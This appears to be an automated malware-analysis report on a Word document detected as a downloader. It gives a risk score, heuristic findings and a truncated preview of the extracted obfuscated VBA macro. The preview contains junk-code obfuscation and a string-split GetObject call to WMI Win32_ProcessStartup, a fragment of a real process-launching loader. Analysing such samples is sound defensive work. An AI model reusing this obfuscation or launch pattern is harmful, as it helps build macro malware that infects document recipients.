MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV and exhibits critical heuristic firings for an obfuscated auto-exec VBA loader. The VBA macros are heavily obfuscated, making it difficult to determine the exact payload, but the presence of GetObject and execution tokens strongly suggests it's designed to download and execute a second-stage payload. The legacy WordBasic and Excel 4.0 macro markers indicate older infection vectors are also present.
Heuristics 9
-
ClamAV: Doc.Downloader.00536d-6863518-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6863518-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72474 bytes |
SHA-256: e8d736fae0387158054954c032f1276331a090fa09d4b99081c9d01aa7040be1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "B62548"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "v8_3688"
Function M_783_()
F_556__8 = 10126874 - 161262929
q080__6 = 727373378 + C70__34_
Select Case t_056_3
Case 750005020
O79_27 = Chr(415394091 * Tan(k7_050_0))
l52207_1 = w_99_8
Case 559537746
o6_21512 = i730_61
t4364__ = I__21__8
Case 955038668
r06008 = 801240696
r4_53_ = w84354_
End Select
w030__ = 59971562 - 762566272
Q686_4 = 156782828 + c1560_9_
Select Case i_6388
Case 176592621
o_9___92 = Chr(607543274 * Tan(i9404404))
J__084_4 = c9322_17
Case 562858142
A94710__ = v339_054
u8761629 = H06135
Case 622733253
f34_197 = 960514666
N04_6_ = t79830
End Select
n9__51_ = 358044507 - 16010089
j0_53354 = 331835156 + R0__2275
Select Case B16__4_
Case 678883657
H9_760_ = Chr(845605139 * Tan(T12_54_8))
t0060056 = Y86__0_6
Case 382362700
h731__ = b54_497
q0588_5 = U_98838
Case 469170451
a60_0_ = 820119388
q326_2 = B028_368
End Select
d0_49___ = 709997633 - 649872911
T1618697 = 632619711 + v06115
Select Case Z538_678
Case 471257513
A__9_9_ = Chr(893440139 * Tan(c22_8294))
c0_08476 = v372_6
Case 175159228
V5761_3 = Z5_4_2_5
E03648 = f_12_8_
Case 304805539
Q_053_ = 904828995
h66377 = q4_3_389
End Select
i96__88 = 238478478 - 17093697
w252_48 = 150704895 + V9440_
Select Case Q___357
Case 573488131
v_73167 = Chr(85504504 * Tan(f30_7841))
N8_0069 = C0623469
Case 220636499
n9_0_34_ = B76926_
f_53343 = n2_165_
Case 655889770
o83__4 = 10106122
X2_8__ = V797_2
End Select
O300090 = 518141297 - 207938376
z8_6_62_ = 177168710 + j938_560
Select Case Z_37__5
Case 596926551
Z_3_49 = Chr(560888294 * Tan(T86689))
G0628_5 = o__8_4_
Case 961695573
T545_585 = d9__64
w_1_7__9 = i5775__
Case 168804481
i_1885_ = 132281634
I85__5_8 = a32_089
End Select
End Function
Function u95500(R2_0737, I36853)
On Error Resume Next
N1148_8 = 539788555 - 216109302
z_43___ = 250449147 + U_835152
Select Case i7_082
Case 8940392
T1706935 = Chr(660888057 * Tan(Z_6__271))
L6031829 = s7670_4
Case 203480121
k07_9_ = p60132
p7522_1 = A6_3__46
Case 143684932
z_9571_ = 216522482
O5513__8 = h5_953__
End Select
o69860_3 = 490953713 - 910322495
S_263_ = 369476737 + O_7___
Select Case R01_6_8
Case 692347740
E627_5_ = Chr(900133470 * Tan(u_33_88))
h8_7_3 = F_1802
Case 282639618
I__2__5 = f7_3_6_
z3_6495 = U139__36
Case 689976788
i99748 = 732930962
E9030520 = O_3___5
End Select
f2___0 = 982231257 - 684671356
S1_3__ = 524187826 + j716_611
Select Case J004_15
Case 531323053
D792_8_ = Chr(59374617 * Tan(m58_298))
Z_972060 = J7536_
Case 248552713
c79_62__ = H479__77
X8_1_7_ = F1_092
Case 265912190
J55_3_9_ = 729309960
P_54681 = D_3601_
End Select
Set I_10__1 = GetObject((Z8_84939 _
+ "winmgm" + X__3__) + (f52206_3 + "ts:Win" + G2_56_51) + "32_Proce" + "ssStartup")
o0_3_5 = 533943814 - 142260364
U305180 = 177187749 + i3_26_
Select Case m65____2
Case 721925268
s_1639 = Chr(972037181 * Tan(K1118_79))
p_296939 = f___2049
Case 824530677
U55_055 = N35_12
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.